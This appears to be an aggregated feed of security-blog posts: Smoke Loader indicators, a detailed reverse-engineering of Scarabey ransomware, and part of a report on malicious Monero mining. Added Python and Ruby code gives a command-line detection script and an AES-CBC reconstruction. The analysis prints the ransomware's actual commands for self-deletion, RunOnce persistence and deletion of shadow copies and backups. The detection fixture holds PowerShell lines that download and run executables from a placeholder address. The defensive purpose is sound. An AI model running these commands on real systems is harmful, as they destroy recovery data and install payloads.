Figure 5 shows what the analysis overview looks like when analyzing the sample discussed in this article: besides some reported structural anomalies, which are detected by our static document analysis, we can see that dynamic behaviors are exhibited only in Windows 10.

Figure 5. Analysis overview of the malicious macro-based document file (sha1: b73b0b80f16bf56b33b9e95e3dffc2a98b2ead16)

Conclusion

In this article, we analyzed a malicious macro-based document relying on a specific version of PowerShell, thereby delivering a highly sophisticated multi-component malware, Smoke Loader. This is achieved by calling a cmdlet normally not available on PowerShell as installed in Windows 7, showing once more that operating system diversity is a key requirement for successful dynamic analysis.

Appendix: IoCs

Files
The Malicious Document b73b0b80f16bf56b33b9e95e3dffc2a98b2ead16
Smoke Loader f227820689bdc628de34cc9c21000f3d458a26bf
Monero CPU Miner 88eba5d205d85c39ced484a3aa7241302fd815e3
Zeus Trojan 54949587044a4e3732087a56bc1d36096b9f0075
GlobeImposter Ransomware f3cd914ba35a79317622d9ac47b9e4bfbc3b3b26
Network
80.82.67[.]217
107.181.254[.]15
Smoke Loader C&C microsoftoutlook[.]bit

The post Smoke Loader Campaign: When Defense Becomes a Numbers Game appeared first on Lastline.

Scarab ransomware: new variant changes tactics

The Scarab ransomware was discovered in June 2017. Since then, several variants have been created and discovered in the wild. The most popular or widespread versions were distributed via the Necurs botnet and were initially written in Visual C. However, after unpacking, we’ve found that another variant discovered in December 2017, called Scarabey, is distributed a little differently and carries different payload code as well.

Scarabey, like most ransomware, is designed to demand a Bitcoin payment from its victims after encrypting files on their systems. However, instead of being distributed via Necurs malspam like the original Scarab, Scarabey was found targeting Russian users and being distributed via RDP/manual dropping on servers and systems.

In addition, Scarabey does not seem to be packed in any of the samples we have come across. The malicious code is written in Delphi, without the C++ packaging that Scarab has, and the content and language of the ransom notes differ between the two.

SAMPLES BEING REFERENCED
SCARAB ORIGINAL: e8806738a575a6639e7c9aac882374ae
SCARABEY VARIANT: 9a02862ac95345359dfc3dcc93e3c10e

The ransom notes

As far as the victim is concerned, the main difference between Scarabey and other Scarab ransomware is the language of the ransom note and the scare tactic used in the encryption message.

In the Scarab sample, the ransom note is written in English, however, it reads as if you translated word-for-word a Russian text into English, without knowing proper English grammar or syntax. Scarabey, on the other hand, is written in Russian. What’s interesting is that when you throw the Scarabey note into Google translate, as I have done below, it contains the same grammatical errors as the Scarab note.

Scarab ransom note

Original Scarab message

Scarabey message, translated from Russian to English with Google translate

This is more proof that the authors of Scarab are likely Russian speakers who wrote the note in their native language and ran it through a translator to be added into the Scarab code. It would then seem quite likely that, since they decided to target Russians, they released the Scarabey note in their native language to cover more victims.

Different threats

In the original Scarab versions, the note warns that the longer the user waits, the more the price will go up.

For Scarabey, on the other hand, it tells users that for every day they wait, more and more files will be deleted, until there are no more files left for them to recover.

Essentially, the criminals are implying that they have copies of the unencrypted files to give back to the user, or that they have control of the victim computer to delete files. This is not true for a few reasons:

  1. Besides the fact that the volume of data transfer needed to upload every file on the victim’s computer is completely unreasonable, there is no network functionality for sending files to the malware authors to hold as ransom.
  2. There is no backdoor or remote access code in Scarab or its variants, which makes the threat of deleting files on the victim’s computer impossible.
  3. The decryption process, from our understanding, is that they will send you decryption software loaded with the unique key after the ransom is paid. Then you can run the software and decrypt your files. That being said, there is no way for them to limit what gets decrypted, as it is done locally and offline.
  4. Nowhere in the malware’s code is there any section that deletes the user’s files from the computer.

Specifically, in the message, you see the author implying that decryption is initially performed server side, which is untrue:

“24 files are deleted every 24 hours. (we have copies of them)
If you do not run the decryption program within 72 hours, all the files on the computer are completely deleted, without the possibility of recovery.”

Then, the malware author gives the steps to decrypt, which reference a decryption program sent to the victim after payment. Decryption software received after payment, loaded with the victim’s unique key, decrypts the files locally:

“- After starting the decoder, the files are decoded within an hour.
– Decoders of other users are incompatible with your data, as each user
unique encryption key”

The conclusion here is that the deletion of files or the idea that the malware authors have access to delete files is purely a scare tactic used to urge users into sending money quickly.

Technical analysis

While comparing the code from Scarab to Scarabey, it became quite clear that this variant, although written in Russian and targeting Russian users, likely comes from the same authors of the original. Throughout the entire code, both variants of malware are almost byte-for-byte identical. In addition, the sub processes generated, the dropped files, the encryption method used, and the mutexes used are all identical between the original Scarab version and Scarabey. This is the reason we consider it a variant, rather than a new family.

The following image shows the output from the two malware variants. The only things that differ are the addresses of code and memory data references (highlighted in yellow and red).

Code analysis

The Scarabey variant is written in Delphi. First, it starts off by checking if it is the first time being run. It does this by checking if it has parameters passed in. If not, it checks to see if the following registry key has been set:

Software\ILRTISo\idle

[First run check, registry key]

If it is not set (meaning this is the first run), it checks that SEVNZ has not been created yet and executes cmd.exe to copy itself into the Roaming AppData directory as sevnz.exe using:

cmd.exe /c copy /y C:\Users\virusLab\Desktop\9a02862ac95345359dfc3dcc93e3c10e.exe “C:\Users\virusLab\AppData\Roaming\sevnz.exe”

Then it spawns a process of itself with param ‘runas’ as it exits.

[verifies SEVNZ.EXE does not exist, copies self to SEVNZ.EXE, executes self with ‘runas’ param]

Now the sub process takes over.

The code flow now enters the same function as before, and deletes SEVNZ and re-copies it. It skips over those initial sections because of the parameter passed in. It then executes the previously copied file sevnz.exe:

C:\Users\[username]\AppData\Roaming\sevnz.exe

Then, it opens the process cmd.exe with command line…

mshta.exe "javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('9a02862ac95345359dfc3dcc93e3c10f.exe');close()}catch(e){}},10);"

…which simply waits and then deletes the original executable, since a process can’t delete its own file while it is running.

Now onto the SEVNZ.exe process:

The process checks to see if it is currently running as sevnz.exe by trying to delete “…AppData\Roaming\sevnz.exe”.

If the deletion fails, it knows that it is currently running as sevnz.exe rather than the original executable. Once it passes this check, it uses mshta.exe to execute JavaScript, which waits briefly and then adds sevnz.exe to the registry auto-run:

mshta.exe "javascript:o=new ActiveXObject('WScript.Shell');
x=new ActiveXObject('Scripting.FileSystemObject');
setInterval(function(){try{i=x.GetFile('sevnz.exe').Path;
o.RegWrite('HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\ILRTISo',i);}
catch(e){}},10);"

Next, it proceeds to delete shadow volume copies, which is standard for ransomware to make sure users cannot restore encrypted files.

Executes these scripts with mshta.exe:

o=new ActiveXObject("WScript.Shell");
o.Run("cmd.exe /c wbadmin DELETE SYSTEMSTATEBACKUP -keepVersions:0",0);
o.Run("cmd.exe /c wmic SHADOWCOPY DELETE",0);
o.Run("cmd.exe /c vssadmin Delete Shadows /All /Quiet",0);
o.Run("cmd.exe /c bcdedit /set {default} recoveryenabled No",0);
o.Run("cmd.exe /c bcdedit /set {default} bootstatuspolicy ignoreallfailures",0);
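The command lines quoted in this section, together with the two PowerShell downloaders in the Smoke Loader post above, are exactly what a process-creation log (Sysmon event 1, EDR telemetry) records. As an added detection example, not code from either write-up, the Python below runs a small set of command-line rules over constructed events that imitate those commands and then correlates the recovery-destroying actions per host. Hostnames, timestamps, the event layout and the 203.0.113.x address are placeholders, not indicators from the posts.

```python
import re
from collections import defaultdict

# Added detection example; not code from the Malwarebytes or Lastline posts.
# Event format (constructed): timestamp|host|parent image|image|command line
SAMPLE_LOG = [
    r"2018-01-23T09:14:02Z|WS-07|winword.exe|powershell.exe|powershell.exe -w 1 Invoke-WebRequest -Uri http://203.0.113.5/poop.jpg -OutFile ([System.IO.Path]::GetTempPath()+'\DKSPKD.exe')",
    r"2018-01-23T09:20:11Z|WS-12|winword.exe|powershell.exe|powershell $webclient = new-object System.Net.WebClient; $path = $env:temp + '\~tmp.exe'; $webclient.DownloadFile('http://203.0.113.5/moo.jpg', $path); Start-Process $path",
    r'''2018-01-23T10:02:40Z|SRV-03|sevnz.exe|mshta.exe|mshta.exe "javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('sevnz.exe').Path;o.RegWrite('HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\ILRTISo',i);}catch(e){}},10);"''',
    r"2018-01-23T10:02:41Z|SRV-03|mshta.exe|cmd.exe|cmd.exe /c vssadmin Delete Shadows /All /Quiet",
    r"2018-01-23T10:02:41Z|SRV-03|mshta.exe|cmd.exe|cmd.exe /c wmic SHADOWCOPY DELETE",
    r"2018-01-23T10:02:42Z|SRV-03|mshta.exe|cmd.exe|cmd.exe /c wbadmin DELETE SYSTEMSTATEBACKUP -keepVersions:0",
    r"2018-01-23T10:02:42Z|SRV-03|mshta.exe|cmd.exe|cmd.exe /c bcdedit /set {default} recoveryenabled No",
    r"2018-01-23T11:30:00Z|SRV-03|cmd.exe|vssadmin.exe|vssadmin list shadows",            # benign admin activity
    r"2018-01-23T11:45:13Z|WS-07|explorer.exe|powershell.exe|powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\inventory.ps1",
]

RULES = [
    ("shadow_copy_deletion",
     re.compile(r"\b(vssadmin(\.exe)?\s+delete\s+shadows|wmic(\.exe)?\s+shadowcopy\s+delete)\b", re.I)),
    ("backup_catalog_deletion",
     re.compile(r"\bwbadmin(\.exe)?\s+delete\s+(systemstatebackup|catalog)\b", re.I)),
    ("boot_recovery_disabled",
     re.compile(r"\bbcdedit(\.exe)?\s+/set\s+\{default\}\s+(recoveryenabled\s+no|bootstatuspolicy\s+ignoreallfailures)\b", re.I)),
    ("mshta_inline_javascript",
     re.compile(r'\bmshta(\.exe)?\s+"?javascript:', re.I)),
    ("runonce_persistence_via_script",
     re.compile(r"regwrite\(.*\\runonce\\", re.I)),
    # Either downloader shape from the Smoke Loader post: a download cmdlet/method
    # plus a temp-directory destination, in any order.
    ("powershell_download_to_temp",
     re.compile(r"^(?=.*\bpowershell)(?=.*\b(invoke-webrequest|downloadfile|downloadstring)\b)(?=.*(gettemppath|\$env:temp|%temp%))", re.I)),
]

# Rules that destroy the victim's ability to recover; ransomware runs several in a row.
RECOVERY_SABOTAGE = {"shadow_copy_deletion", "backup_catalog_deletion", "boot_recovery_disabled"}


def parse_event(line: str) -> dict:
    ts, host, parent, image, cmd = line.split("|", 4)   # maxsplit keeps any '|' inside the command line
    return {"ts": ts, "host": host, "parent": parent, "image": image, "cmd": cmd}


def match_rules(command_line: str) -> list:
    norm = " ".join(command_line.split())                # collapse irregular spacing before matching
    return [name for name, rx in RULES if rx.search(norm)]


def scan(lines) -> list:
    hits = []
    for n, line in enumerate(lines, 1):
        ev = parse_event(line)
        for rule in match_rules(ev["cmd"]):
            hits.append({"line": n, "host": ev["host"], "image": ev["image"], "rule": rule})
    return hits


def hosts_with_recovery_sabotage(hits, min_distinct: int = 2) -> list:
    """One backup-deletion command may be an administrator; two or more distinct
    recovery-destroying actions on the same host is the pre-encryption pattern."""
    seen = defaultdict(set)
    for h in hits:
        if h["rule"] in RECOVERY_SABOTAGE:
            seen[h["host"]].add(h["rule"])
    return sorted(host for host, rules in seen.items() if len(rules) >= min_distinct)


if __name__ == "__main__":
    found = scan(SAMPLE_LOG)
    for h in found:
        print(h)
    print("recovery sabotage on:", hosts_with_recovery_sabotage(found))
```

The per-host correlation is the part worth keeping: a lone vssadmin command is noisy in most environments, but shadow-copy deletion, backup-catalog deletion and a bcdedit recovery change within the same short window on one host is rarely anything but ransomware staging, and it fires before the first file is encrypted.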

It then opens a thread that loops forever and makes sure no “key” processes are running. If any are found, it kills them. The likely reason is that these processes hold a lock on files that the ransomware wants to encrypt; killing them frees the files for encryption. The process names come from a generated string:

agntsvc.exe
isqlplussvc.exe
ncsvc.exe
msftesql.exe
sqlagent.exe
sqlbrowser.exe
sqlservr.exe
sqlserver.exe
sqlwriter.exe
oracle.exe
ocssd.exe
dbsnmp.exe
synctime.exe
mydesktopqos.exe
agntsvc.exe
isqlplussvc.exe
xfssvccon.exe
mydesktopservice.exe
ocautoupds.exe
agntsvc.exe
agntsvc.exe
agntsvc.exe
encsvc.exe
firefoxconfig.exe
tbirdconfig.exe
ocomm.exe
mysqld.exe
mysqld-nt.exe
mysqld-opt.exe
dbeng50.exe
sqbcoreservice.exe

In the main loop of the encryption function, it performs constant checks throughout the code for a mutex, and if it exists, this is a sign to clean itself up and remove itself from the system:

MUTEX:   STOPSCARABSTOPSCARABSTOPSCARABSTOPSCARABSTOPSCARAB.

The encryption loop can be called through many different sections in the code, but the section that runs initially and performs the majority of the encryptions is pictured below:

It recursively goes through all folders and checks that the file extension is not .exe or .dll. If the check passes, it encrypts the file and renames it with a .scarab extension.

[checking current file extension using POS(),  if exists as substr of “exe,dll”]

The encryption code does not directly use any crypto APIs. Instead, the AES code is embedded within the malware, as shown in the images above.

[section is the setup leading to the call to the main cryptor function]

Encryption algorithm

We have determined that the algorithm for encryption is AES. A 4-byte chunk (0xDEFACE01) is tacked onto the buffer before the actual file data that it reads. This could be salt, or a joke from the malware author. It performs some data manipulation operations using generated bytes, which could likely be the initialization vector to create randomness.

[IV GENERATOR FUNCTION FOLLOWED BY START OF AES SETUP]
[XORS DATA PASSED INTO THE MAIN_AES_LOOP_FUNCTION WHICH IS THE IV.  var_8 being the encryption key]

The malware proceeds to run AES 256 on the data, via the AES_ALGO labeled function. We determined it’s AES 256 because of a few properties.

  1. It uses 16-byte blocks, which is standard for every AES variant. It encrypts 16 bytes (characters) of the file at a time, which is 128 bits.
  2. What differentiates the AES variants is the key size and the number of encryption rounds. In this case it uses 14 rounds, which is standard for AES 256, instead of the 10 rounds used by AES 128. The key size is also 256 bits (32 bytes, or characters).
  3. The mode of operation is CBC (cipher block chaining). The main indicator of CBC here is that the previous ciphertext block is used to encrypt the next plaintext block. In other words, the previous encrypted block serves as the initialization vector for the next block of data to be encrypted.
[showing the flow for AES CBC, IV being used first, followed by previous cipher text being used as IV]

In this case, the IV bytes are XORed against the plaintext bytes as an initialization step to add randomness to the result. As you can see from the next image, the output of AES is then copied into the variable that is used at the beginning of the loop to initialize the next plaintext block before AES is run on it. At this point the AES usage is clear, even though no crypto APIs are called.

[The image below shows where the previous cipher-text is used for initialization as the IV. NOTE: var_28 will contain the encrypted data]

Below are a few screenshots illustrating the algorithm. As you can see, the data is loaded into matrices. Then a series of data operations is performed against some hardcoded data, together with the encryption key bytes. The highlighted text below is one set of operations (1 of 4) within a single round; four of these sets make up one encryption round, because the matrix mathematics requires the operation to be performed for each item in the matrix against each of the others. As stated earlier, 14 rounds are done in total.
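To make the identification above concrete, here is an added example (not Scarab's code, and not from the Malwarebytes analysis) that rebuilds the described construction by hand: the 0xDEFACE01 header in front of the file data, the IV XORed into the first block, and each ciphertext block carried forward as the IV of the next, all over a raw AES-256 block primitive. It then checks that result against OpenSSL's own AES-256-CBC mode. The header byte order and the PKCS#7 padding are assumptions; the post states neither.

```ruby
require 'openssl'
require 'securerandom'

# Added example, not Scarab's code. Assumption: the 4-byte header is stored
# little-endian and the buffer is PKCS#7 padded to a 16-byte multiple.
FILE_HEADER = [0xDEFACE01].pack('V')

# One raw AES-256 block operation; the chaining is built by hand on top of it,
# mirroring the "no crypto API, embedded AES" observation in the analysis.
def aes256_block(key, block)
  c = OpenSSL::Cipher.new('aes-256-ecb')
  c.encrypt
  c.padding = 0
  c.key = key
  c.update(block) + c.final
end

def xor_bytes(a, b)
  a.bytes.zip(b.bytes).map { |x, y| x ^ y }.pack('C*')
end

def pkcs7_pad(data)
  n = 16 - (data.bytesize % 16)
  data + ([n] * n).pack('C*')
end

# The loop the analysis describes: XOR the plaintext block with the "IV"
# (the real IV for block 0, the previous ciphertext afterwards), then AES it.
def scarab_style_encrypt(key, iv, file_data)
  buffer = pkcs7_pad(FILE_HEADER + file_data)
  prev = iv
  out = String.new
  buffer.bytes.each_slice(16) do |slice|
    block = aes256_block(key, xor_bytes(slice.pack('C*'), prev))
    out << block
    prev = block # previous ciphertext becomes the IV of the next block
  end
  out
end

# Reference: the same buffer through the library's own CBC mode.
def openssl_cbc_encrypt(key, iv, file_data)
  c = OpenSSL::Cipher.new('aes-256-cbc')
  c.encrypt
  c.key = key
  c.iv = iv
  c.update(FILE_HEADER + file_data) + c.final
end

# Decrypt with the library and split off the header: [header_present, data].
def openssl_cbc_decrypt(key, iv, ciphertext)
  c = OpenSSL::Cipher.new('aes-256-cbc')
  c.decrypt
  c.key = key
  c.iv = iv
  plain = c.update(ciphertext) + c.final
  [plain[0, 4] == FILE_HEADER, plain[4..-1]]
end

# True when the hand-built chaining equals OpenSSL's CBC output, i.e. the
# "previous ciphertext as IV" loop really is AES-256-CBC.
def chaining_matches_library?
  key = SecureRandom.random_bytes(32)
  iv = SecureRandom.random_bytes(16)
  data = "constructed sample file contents\n" * 3
  scarab_style_encrypt(key, iv, data) == openssl_cbc_encrypt(key, iv, data)
end
```

Because the chaining is standard CBC, the only thing that makes Scarab's output special is the per-file key handling described further down, not the cipher construction itself.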


The encoded encryption key is written in the registry ‘temp’ key:

If the key is found in the registry, it proceeds to the function that decodes the registry value into the raw encryption key. Otherwise, it jumps to the key generation function.

This is interesting because it is the main key used to encrypt files. The format is similar to the key from the ransom note, but this one is longer, suggesting that the key given to the user as the ID is an encoded version of the key stored in the registry. Example of the dumped key:

[HKEY_CURRENT_USER\Software\ILRTISo]
"temp"="VkIAAAAAAADpt9Q2lAzhCExfqjLoD3vSpluc678N56Zn8b7LVRxMi1ZsYk2HXD1e4s3tiefTmZJAc0vxPposvLzP0yaCh5+KRQm60U0EkzeB2NXetarabUFYgJxb8QRsygKaOqBriC4Bs4ajM24h=e2CsVNP9R3q==UXNmfRFGIsv7NR9BIxE35bdoFpTU8rMGQ14MeQcAii1iY7GpNoY3b4DOgfuKGo3qNC1MYKYdfpn0dbiow3f7ZQGClpwTZ0shFhkWk7aTA7TM1prtgJte7TWe=ERHg8GaFrZtVs9ylNTYPt5CmzHBdAIaXeKZvZnSSafbi83o9gLgAS1OxAb7LBtJpZAJDyBkuyJFR4dFbXztponIBKT1OjtTvTMy07+0B4jI3=K1QGuKSROjAdCF06TsjKWlvUw0iUHRGasz946H3Mnxu3GdCHrAp9Cd94bMo1x1PVdIi3bXSwobjgOlJgJPJC4Y6J4QIE=e45PDNzdK6aCY0uiQ0jOD=8lDWTp=+r+dbGJrJ12qn8CRnBwaFIpyNjDhzdMdTwyvExCmuOesOLms8S7TRoV1GcTyWJAQpSJYcR66H6CngM5GHopdpoTH4mWVOOYp5HFHTDAvMafomF2S6xEmUgXIcKpB7oNohO+Wx0cUmf95=+9uozHMBWE4kFhj+OOKw0I7w7HnwYfafhxsw0CmoOvorZztXk8whlh1d4U26z=aJ6JwH8wVBSszsRLQ+H4y3bRaeupq5Vo+smDfigjVVzCam4HoAdOKzN9MWiigl9Oi+4vTkSFFazc6HzyVaHg8luKGBJMhi2FNHTFO56RA"

Versus the key from the ransom note:

+4IAAAAAAADIGnmIHZL=FYRQCAN=AgKnzw+0uzFbXSR5AdFlfTrhWN9sifnho8LiX5=V8SbNVWyWWrdbTLipFEeeEv=9zLmnid8e
UqlqKr2RUN=V7LdjoyNwjWMNbylRiGNAKWK6g9exeHhVfUrZ+9oRTq6Kp5eNe7kDdV7UMPVZ12=5pm9a+5lOMw==TNi2R2tUjFcK
tTD3c9IZgJwOMgcOw3fRrmgaloh5cIV3V74DRy2segx13RDL4J6B+gJnfT2mxIZuBE1G5HcmuLHCoqQif2BamhfbMASCUEpOp7+Z
G0jI=1PTmOhD3Yq4XjJWI4mc61AruRlaYqwPTUUbrsI0zTYX1mmM3Tvyso8bqDy4h5meyPYuXlgtRj06mtdrGZszb6ObsIT4Fz0O
Ag=4HgI4VSHA=HAU5yCjZzIIkLhlWGvdAk

The key used to encrypt changes from file to file, meaning that two files with identical content will differ after encryption. Essentially, there is an initial key from which many sub-keys are derived. If a single encryption key were used for all files (as has been seen with other ransomware), you could capture memory at any point during encryption, save the key, and use it to decrypt every file on the drive. Unfortunately, because of the key cycling that Scarab performs, decryption of the files is likely impossible.

After the full disk encryption is complete, the ransomware calls a function that enumerates all network folders and drives, for example VMware shared folders, Terminal Services shares and network drives. If any are found, it encrypts the files within those folders as well.

Once complete, it opens the encryption message via notepad.exe.

Rumors

There have been a number of articles we’ve come across online that state that Scarabey has the ability to act as a backdoor, allowing remote access, and may also gather sensitive data. From our analysis, we believe this to be untrue. We found no sign of any functionality beyond encrypting files on the user’s computer.

Additionally, there were rumors of Scarab being built off the open source ransomware project on GitHub called HiddenTear. We have confirmed this to be untrue in both our own research and with external researchers. It now seems to be an industry consensus that this was posted in error.

Malwarebytes for Windows detects this threat and its variant as: Ransom.Scarab.

The post Scarab ransomware: new variant changes tactics appeared first on Malwarebytes Labs.

Ransom Where? Malicious Cryptocurrency Miners Takeover, Generating Millions

The Dark Side of the Digital Gold Rush


This post was authored by Nick Biasini, Edmund Brumaghin, Warren Mercer and Josh Reynolds with contributions from Azim Khodijbaev and David Liebenberg.


Executive Summary


The threat landscape is constantly changing; over the last few years malware threat vectors, methods and payloads have rapidly evolved. Recently, as cryptocurrency values have exploded, mining-related attacks have emerged as a primary interest for many attackers, who are beginning to recognize that they can realize all of the financial upside of previous attacks like ransomware without needing to engage the victim and without the law enforcement attention that ransomware attacks attract.

This focus on mining isn't entirely surprising, considering that various cryptocurrencies along with "blockchain" have been all over the news as the value of these currencies has exponentially increased. Adversaries have taken note of these gains and have been creating new attacks that help them monetize this growth. Over the past several months Talos has observed a marked increase in the volume of cryptocurrency mining software being maliciously delivered to victims.

In this new business model, attackers are no longer penalizing victims for opening an attachment, or running a malicious script by taking systems hostage and demanding a ransom. Now attackers are actively leveraging the resources of infected systems for cryptocurrency mining. In these cases the better the performance and computing power of the targeted system, the better for the attacker from a revenue generation perspective. IoT devices, with their lack of monitoring and lack of day to day user engagement, are fast becoming an attractive target for these attackers, as they offer processing power without direct victim oversight. While the computing resources within most IoT devices are generally limited, the number of exposed devices that are vulnerable to publicly available exploits is high which may make them attractive to cyber criminals moving forward.

To put the financial gains in perspective, an average system would likely generate about $0.25 of Monero per day, meaning that an adversary who has enlisted 2,000 victims (not a hard feat), could generate $500 per day or $182,500 per year. Talos has observed botnets consisting of millions of infected systems, which using our previous logic means that these systems could be leveraged to generate more than $100 million per year theoretically. It is important to note that due to volatility present across cryptocurrency markets, these values may change drastically from day to day. All calculations in this blog were made based on XMR/USD at the time of this writing.

This is all done with minimal effort following the initial infection. More importantly, with little chance of being detected, this revenue stream can continue in perpetuity. While these are impressive figures, it's also important to factor in a few details that can further increase the value of these attacks exponentially:
  • The value of many cryptocurrencies is skyrocketing. Monero, one of the most popular mining targets, saw a 3000% increase over the last 12 months.
  • These attacks are much stealthier than their predecessors. Attackers are not stealing anything more than computing power from their victims, and the mining software isn't technically malware, so theoretically the victims could remain part of the adversary's botnet for as long as the attacker chooses.
  • Once the currency is mined, there is no telling what the attacker might do with it. This could become a long term investment (or even retirement) scheme for these attackers – sitting on this currency until it hits such a point where the attacker decides to cash in.

Introduction


Throughout the past couple of years ransomware has dominated the threat landscape and for good reason. It creates a highly profitable business model that allows attackers to directly monetize their nefarious activities. However, there are a couple of limitations with the use of ransomware. First is the fact that only a small percentage of infected users will actually pay the ransom demanded by the attacker. Second, as systems and technology get better at detecting and blocking ransomware attacks the pool of possible victims is changing. Potential victims in many countries lack the financial capabilities to pay $300-$500 to retrieve their data. Possibly related to these aforementioned limitations, we have begun to see a steady shift in the payloads that are being delivered. This is especially true for some of the most common methods for malware distribution such as exploit kits and spam campaigns.

Over the past several months Talos has started to observe a marked increase in the volume of cryptocurrency miners being delivered to victims. Cryptocurrency and "blockchain" have been all over the news over the past several months as the value of these currencies has increased on an exponential path. One of the most effective ways to generate these currencies is through mining and adversaries are obviously paying attention.

What is 'Mining'?


At a high level mining is simply using system resources to solve large mathematical calculations which result in some amount of cryptocurrency being awarded to the solvers. Before we get too deep into mining let's address the currencies that make sense to mine.

Bitcoin (BTC) is the most well known and widely used cryptocurrency by a wide margin. It's been mined since its inception, but today mining isn't an effective way to generate value. If you look across all of the cryptocurrencies, there are only a couple that are worth mining without specialized hardware called ASICs (Application Specific Integrated Circuits). The differences across the different cryptocurrencies are based on the hashing algorithm used. Some have been specifically designed in an attempt to prevent or hinder the use of such specialised hardware and are more focused on consumer grade equipment such as CPU & GPU hardware. Currently, the most valuable currency to mine with standard systems is Monero (XMR) and adversaries have done their research. In addition Monero is extremely privacy conscious and as governments have started to scrutinize Bitcoin more closely, Monero and other coins with heavy emphasis on privacy may become a safe haven for threat actors.

There are two ways that mining can be performed, either with a stand alone miner or by leveraging mining pools. Pool-based crypto mining allows you to pool the resources of multiple systems resulting in a higher hashrate and theoretically the production of increased amounts of currency. It's pool-based mining of Monero that we have seen most frequently leveraged by attackers as it allows for the greatest amount of return on investment and the required mining software can be easily delivered to victims. The use of pooled mining also maximizes the effectiveness of the computing resources found in standard systems that attackers attempt to compromise. This is similar to launching Distributed Denial of Service (DDoS) attacks where 100,000 machines flooding a target with bogus traffic becomes much more effective compared to a single system under the attacker's control sending bogus traffic.

How does pool based mining work?


Pool-based mining is coordinated through the use of 'Worker IDs'. These IDs tie an individual system to a larger pool and ensure that the coin mined under a particular Worker ID is delivered to the correct user. It is these Worker IDs that allowed us to determine the size and scale of some of the malicious operations, as well as get an idea of the amount of revenue adversaries are generating. For the purposes of this discussion we will be assuming the following:
  1. The amount of hashes per second that a typical computer can compute will be assumed to be ~125 H/s.
  2. While in reality mining does not always guarantee successful generation of the cryptocurrency being mined, we will assume that for our purposes it is successful as it allows for a better understanding of the earning potential for these malicious mining pools.
These miners typically operate from the command line and take a series of arguments that establish how the mining should be performed. A typical example of the command line syntax used to execute the mining software and specify the arguments is below (note that parameter names vary with the specific mining software being used):
Example Command Line Syntax

As you can see, two primary arguments are required: the URL of the mining pool and the 'Worker ID' that ties the mining activity on the system to a specific account at the pool, which is used to manage payouts. However, through our investigation we have found a plethora of other parameters that attackers or miners can specify in an attempt to hide their activity. If the mining software is executed without these options, victims might notice significant performance degradation on their systems, as no limits are enforced on computing resources. These options include:
  • Limits on CPU Usage.
  • Limits on System Temperature.
  • Amount of cores being used.
  • Sleep periods.
Each mining program comes with its own set of flags that are taken advantage of in various ways by both legitimate and malicious miners. We have observed that these options are typically deployed by the attackers when they achieve persistence (i.e. through the creation of Scheduled Tasks or Run keys that execute the miner using the Windows Command Processor specifying the arguments to use).

Origins on the Underground


Talos has been observing discussions regarding the use of crypto miners as malicious payloads by both Chinese and Russian crimeware groups. We first observed Chinese actors discussing miners and the associated mining botnets in November 2016 and the interest has been steadily building since that time.

From a Russian underground perspective there has been significant movement related to mining in the last six months. There have been numerous discussions and several offerings on top-tier Russian hacking forums. The discussions have been split with the majority of the discussion around the sale of access to mining bots as well as bot developers looking to buy access to compromised hosts for the intended purpose of leveraging them for crypto mining. The popularity increase has also been accompanied with a learning curve associated with mining, including a better understanding around how much coin can be mined and the opportune times to conduct the mining activity. As far as the malware that can be used to conduct mining, most of them are written in C# or C++ and as is common on these forums they are advertised with low detection rate, persistence, and constant development. In many cases we are observing updates to these threats on a daily or weekly basis.

In general the attackers have been pleased with the amount of revenue the bots generate as well as the potential to grow that revenue. This is indicative of a threat that is poised to become more pervasive over time. Let's take a look at how malicious mining works and the threats that are delivering them.

Malicious Mining


Malicious mining is the focus of this post since it is an emerging trend across the threat landscape. Adversaries are always looking for ways to monetize their nefarious activities, and malicious mining is quickly becoming a cash cow for the bad guys.

Over the past several years ransomware has dominated the threat landscape from a financially motivated malware perspective and with good reason. It is an extremely profitable business model as we've shown through our Angler Exploit Kit research where we estimate that the adversaries behind Angler could have been conservatively making at least $30 million annually. However, with success comes attention and with that attention came an increased focus on stopping this type of activity. Both operating systems and security vendors got better at stopping ransomware before it affected much of the system.

Adversaries are left with an interesting decision: continue leveraging ransomware as a primary source of revenue as the pool of users and vulnerable systems continues to shrink, or begin leveraging other payloads. There is no shortage of options available to bad guys, including banking trojans, bots, credential stealers, and click-fraud malware, to name a few.

So why choose crypto mining software?

There are many reasons why adversaries might choose to leverage crypto mining to generate revenue. One likely reason is that this is a largely hands-off infection to manage. Once a miner has been dropped on a system and starts mining, nothing else is needed from the adversary's perspective. There is no command and control activity, and it generates revenue consistently until it is removed. So if an adversary notices a drop-off in nodes mining to their pool, it's time to infect more systems. Another reason is that it goes largely unnoticed by the majority of users. Is a user really going to notice that mining is going on while they are reading their email, browsing the web, or writing up their latest proposal? From this perspective miners are the polar opposite of ransomware, staying out of the user's view for as long as possible. The longer the user fails to notice the miner running, the larger the potential payout.

The biggest reason of them all is the potential monetary payout associated with mining activity. If it didn't generate a profit, the bad guys wouldn't take advantage of it. In this particular vein malicious miners could be a pretty large source of revenue. The biggest cost associated with mining is the hardware to mine and the electricity to power the mining hardware. By leveraging malicious miners attackers can take both of those costs out of the equation altogether. Since they are able to take advantage of computing resources present in infected systems, there is no cost for power or hardware and attackers receive all the benefits of the mined coin.

Let's take a deeper dive on the amount of revenue these systems can potentially generate. As mentioned earlier the hashrate for computers can vary widely depending on the type of hardware being used and the average system load outside of the miners. An average system would likely compute somewhere around 125 hashes per second. One system alone without any hardware or electricity cost would generate about $0.25 of Monero a day, which doesn't seem like a lot but when you start pooling systems the amount of earning potential increases rapidly.

Some of the largest botnets across the threat landscape consist of millions of infected systems under the control of an attacker. Imagine controlling a small fraction of the systems that are part of one of these botnets (~2,000 hosts). The amount of revenue that can be generated per day increases considerably to more than $500 in Monero per day or $182,500 per year. As we will demonstrate later in the post we have seen malicious pools that far exceed the 125 KH/s necessary to generate this type of revenue.

In one campaign that we analyzed, the attacker had managed to amass enough computing resources to reach a hash rate of 55.20 KH/s. As can be seen in the below screenshot the Total Paid value was 528 XMR, which converts to approximately $167,833 USD. In this particular case the mining pool realized that the 'Worker ID' was being used by a botnet to mine Monero.
Worker ID Statistics

